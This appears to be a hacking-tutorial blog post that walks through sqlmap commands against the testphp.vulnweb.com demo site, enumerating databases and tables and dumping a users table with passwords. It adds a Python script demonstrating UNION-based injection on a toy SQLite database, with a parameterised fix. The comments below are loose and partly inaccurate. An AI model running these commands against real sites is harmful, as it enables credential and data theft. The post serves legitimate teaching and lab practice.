Hacking Website with Sqlmap in Kali Linux

Disclaimer – TLDR; some stuff here can be used to carry out illegal activity, our intention is, however, to educate

In the previous tutorial, we exploited a SQL injection using nothing but a web browser on a Windows machine. It was a clumsy method, to say the least, but knowing the basics is necessary before moving on to the advanced tools. In this tutorial we'll use Kali Linux and sqlmap (which comes preinstalled in Kali) to automate what we did by hand in the Manual SQL Injection tutorial.

It is recommended that you go through the earlier tutorial first, so that you know how to find a vulnerable parameter. Here we skip the first few steps, in which we test whether a parameter is injectable at all, because we already know from the previous tutorial that this one is.

Kali Linux

First off, you need Kali Linux (or the older BackTrack) up and running on your machine. Any other Linux distro will work too, but you'll have to install sqlmap yourself (it is a Python tool, so `git clone` of the upstream repository or your distro's package is enough). If you don't have Kali installed yet, see the Beginner Hacking Using Kali Linux page on this site first.

Sqlmap

Basically, it is a tool that makes SQL injection easier. The official website introduces it as: "sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections." The full feature list is on the sqlmap website; the most important item is "Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems." That covers nearly every DBMS you will meet behind a web application, and in practice most of the time it will be MySQL.

SQL Version

Boot into your Kali linux machine. Start a terminal, and type –

sqlmap -h

This lists the basic options sqlmap supports (`sqlmap -hh` shows the full, much longer list). To start with, we'll run the simplest possible command, `sqlmap -u <URL to inject>`. In our case that is:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

Note that the option names use two dashes (`--dbs`, `--tables`, and so on); a single long dash is a copy-and-paste artifact and sqlmap will reject it. One option worth knowing about early is `--time-sec`, which sets how many seconds sqlmap expects a time-based blind payload to delay the response (the default is 5). It does not speed anything up; on a slow or jittery server you raise it so that ordinary latency is not mistaken for a successful time-based injection, which would otherwise produce false positives:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15

Either way, when sqlmap is done it reports the injectable parameter, the injection techniques that worked, the back-end DBMS (MySQL here) and its version, plus some other useful details about the target, such as the web server and server-side language it fingerprinted.

Note: Depending on a number of factors, sqlmap may sometimes ask you questions that have to be answered with yes or no. Typing y means yes and n means no. Here are a few typical questions you might come across:

  • A message saying that the back-end DBMS is probably MySQL and asking whether sqlmap should skip the tests for other DBMSes. Your answer should be yes (y).
  • A message asking whether to include the test payloads specific to certain MySQL versions. The answer depends on the situation; if you are unsure, it is usually better to say yes.

If you would rather not answer at all (for example when running sqlmap from a script), add `--batch`, which makes sqlmap take the default answer to every prompt.

Enumeration

Database

In this step, we will obtain the database names, table names, column names and finally the data itself.

First we will get the names of the available databases. For this we add `--dbs` to our previous command. The final command looks like this:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

The two databases reported are acuart and information_schema.

Table

We are obviously interested in the acuart database. information_schema is not a table but a built-in database present on every MySQL server; it describes the structure of the other databases (their tables, columns, privileges and so on) rather than holding application data. It is not what we are after here, but it is exactly what sqlmap reads behind the scenes to enumerate tables and columns, and it can be useful on other occasions. So now we specify the database of interest with -D and ask sqlmap to list its tables with `--tables`. The final command is:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

The result should be something like this:

Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

Now we have a list of tables. Following the same pattern, we will now get a list of columns.

Columns

Now we specify the database with -D, the table with -T, and request the columns with `--columns`. You should be seeing the pattern by now. The most appealing table here is users, because it is likely to contain the usernames and passwords of the site's registered users (attackers always go for the sensitive data first). The final command is:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

sqlmap answers with a table listing each column of users together with its declared type; among them are email, name and pass, which we use in the next step.

Data

If you have been following along attentively, you will expect that we now fetch the data from one of the columns. That is not wrong, but it is time to go one step further and fetch data from several columns at once. As usual, we specify the database with -D, the table with -T, and the columns with -C, separating multiple column names with commas, and then ask for their contents with `--dump`. The final command looks like this:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump

The result is a single row: name John Smith, password test, email email@email.com. Nothing great, but this is a deliberately vulnerable demo site; in real-world web pentesting you can come across far more sensitive data. If you do, the right thing to do is to contact the site's administrator and tell them to fix the vulnerability as soon as possible. Don't get tempted to join the dark side; you don't look pretty behind bars. That's it for this tutorial. Try looking at the other tables and columns and see what you can dig up, and take a look at the previous tutorial on Manual SQL Injection, which will help you find more interesting vulnerable sites.
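To make clear what the `--tables`, `--columns` and `--dump` switches actually do behind the scenes, here is the same enumeration carried out by hand against a toy, in-memory SQLite database. This is an added example written for this page, not code from the original tutorial or from the sqlmap project: the schema, the two constructed rows in `users`, and the `listproducts_vulnerable()` function that mimics `listproducts.php?cat=1` are all assumptions, and sqlmap's real payloads are more elaborate than these. SQLite has no `information_schema`, so `sqlite_master` plays its role; on MySQL the same queries would read `information_schema.tables` and `information_schema.columns`. The parameterised `listproducts_fixed()` shows the one-line fix that makes every payload below return nothing.

```python
import re
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data (assumption): a tiny shop catalogue plus a
    users table with plaintext passwords, like acuart.users in the tutorial."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, cat INTEGER);
        CREATE TABLE users (uname TEXT, pass TEXT, email TEXT);
        INSERT INTO products VALUES (1, 'Poster', 1), (2, 'Mug', 1), (3, 'Lamp', 2);
        INSERT INTO users VALUES ('test', 'test', 'email@email.com'),
                                ('admin', 'hunter2', 'admin@example.invalid');
    """)
    return conn


def listproducts_vulnerable(conn: sqlite3.Connection, cat: str) -> list:
    """The bug sqlmap finds on listproducts.php?cat=1: the parameter is
    concatenated into the statement, so it is parsed as SQL, not as data."""
    return conn.execute("SELECT id, name, cat FROM products WHERE cat = " + cat).fetchall()


def listproducts_fixed(conn: sqlite3.Connection, cat: str) -> list:
    """The fix: a bound parameter. SQLite applies the column's INTEGER affinity
    to the bound text, so '1' still matches while an injection payload matches nothing."""
    return conn.execute("SELECT id, name, cat FROM products WHERE cat = ?", (cat,)).fetchall()


def inject(conn: sqlite3.Connection, payload: str) -> list:
    """Stands in for one HTTP request: the payload rides in the cat parameter
    and the rows the page would render come back."""
    return listproducts_vulnerable(conn, payload)


def find_column_count(conn: sqlite3.Connection, max_cols: int = 10) -> int:
    """sqlmap's first UNION step: append NULLs until the UNION stops erroring;
    that count is the number of columns the page's own SELECT returns."""
    for n in range(1, max_cols + 1):
        try:
            inject(conn, "1 UNION SELECT " + ",".join(["NULL"] * n))
            return n
        except sqlite3.OperationalError:
            continue
    raise RuntimeError("could not determine column count")


def union_select(conn: sqlite3.Connection, expr: str, source: str) -> list:
    """Run a UNION payload that returns one attacker-chosen expression per row
    in the first column; cat=-1 makes the page's own query contribute no rows."""
    pad = ",NULL" * (find_column_count(conn) - 1)
    return [row[0] for row in inject(conn, f"-1 UNION SELECT {expr}{pad} FROM {source}")]


def enumerate_tables(conn: sqlite3.Connection) -> list:
    """--tables: sqlmap reads information_schema.tables on MySQL;
    sqlite_master holds the same facts in SQLite."""
    return sorted(union_select(conn, "name", "sqlite_master WHERE type = 'table'"))


def enumerate_columns(conn: sqlite3.Connection, table: str) -> list:
    """--columns: sqlite_master.sql stores the CREATE TABLE text, which names
    every column (MySQL keeps this in information_schema.columns)."""
    ddl = union_select(conn, "sql", f"sqlite_master WHERE name = '{table}'")[0]
    body = re.search(r"\((.*)\)", ddl, re.S).group(1)
    return [col.split()[0] for col in body.split(",")]


def dump_table(conn: sqlite3.Connection, table: str, columns: list) -> list:
    """--dump: pack the chosen columns into the one usable UNION slot with the
    string operator (sqlmap uses CONCAT on MySQL), then split them apart again."""
    expr = " || ':' || ".join(columns)
    return sorted(tuple(value.split(":")) for value in union_select(conn, expr, table))


if __name__ == "__main__":
    db = build_db()
    print("tables:", enumerate_tables(db))
    cols = enumerate_columns(db, "users")
    print("users columns:", cols)
    for row in dump_table(db, "users", cols):
        print("  ", row)
    # The same payload against the parameterised handler returns no rows.
    print("hardened:", listproducts_fixed(db, "-1 UNION SELECT name,NULL,NULL FROM sqlite_master"))
```

Run it with any Python 3.9 or later; it needs nothing beyond the standard library. Each call to `inject()` corresponds to one request sqlmap would send, which is why a `--dump` of a large table against a blind (non-UNION) injection takes so long: without a UNION slot to carry whole rows, sqlmap has to infer the data a character at a time from true/false or timing differences.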

11 thoughts on “Hacking Website with Sqlmap in Kali Linux”

  1. Hi, how are you?
    I know that you use Linux here,
    but I happen to have a problem with sqlmap. I recently installed it on Windows 8.1 along with Python 2.7, but when I open cmd and type the command sqlmap.py -u http://www.teamger.us/store.php?ID=1 --dbs it throws me an error in a Notepad window.
    Link: file:///G:/Error sqlmap.py
    I hope you can help me with this problem. Thank you.

  5. There is a common misconception based on the fact that one form of hacking is called an SQL injection attack. That seems to imply that somehow SQL is used to attack databases. This is not the case. SQL is used to create, modify, delete, and query databases, not to hack them. SQL is the doorkeeper that grants access to a database. That means that any hack attempt must fool the SQL doorkeeper into letting it through. When you enter data into a data entry field, it is an SQL statement that receives that entry and decides what to do with it. If the entry is not well-formed, as it would purposely not be in a deliberate attack, it’s possible for the SQL guarding the door to mishandle it. This could lead to the unintended revealing of system information, and ultimately to the hacker taking over not just the database, but the entire database server. This whole disaster can be averted by having the doorkeeper respond properly to illegal data entries.

  6. Let me clear some things up first — SQL is a method of storing structured data (in tables and databases, for example.)

    In fact, SQL is the foundation of a database — you don’t use it to attack itself.

    There are different ways of gaining unauthorized access to a, say, MySQL database. You could get in with a SQL injection, by attacking a website's backend, or maybe get in by slipping through the server's unsecured SSH server.

    Hope this helps.

  7. SQL is a language invented for querying and manipulating relational databases. What hackers would do is figure out how to send SQL commands the owners of the database didn’t intend.

    This can be done sometimes by entering SQL commands into forms on websites that were written with the assumption that only nonexecutable data would be entered.

  8. If you are referring to SQL injection, then I must tell you that in the current software industry nobody uses a direct if/else condition to log in to a website.

    This is how previous logins used to be:

    User: xyz Password: 124

    If I am logging in with the correct password, then the server-side code does this:

    select * from loginTable where User = xyz

    If this matches the current one, then login succeeds.

    Now, to break this code a simple change is needed.

    Just change it like this:

    Password = (1=1)

    This will be true in every case, and hence SQL injection will break the security.

    Nowadays LDAP mechanisms are used for login. It's highly secure and reliable.

  9. If you mean bypass security mechanisms and inject malicious code or data into a system, the answer is sort of yes. You can do something called SQL injection, where malicious SQL code is entered into a system. This is usually due to a security vulnerability in the system that accepts the SQL code.

    If the vulnerable system is vulnerable enough, the injected code could even do serious damage if the right kind of statements were used.
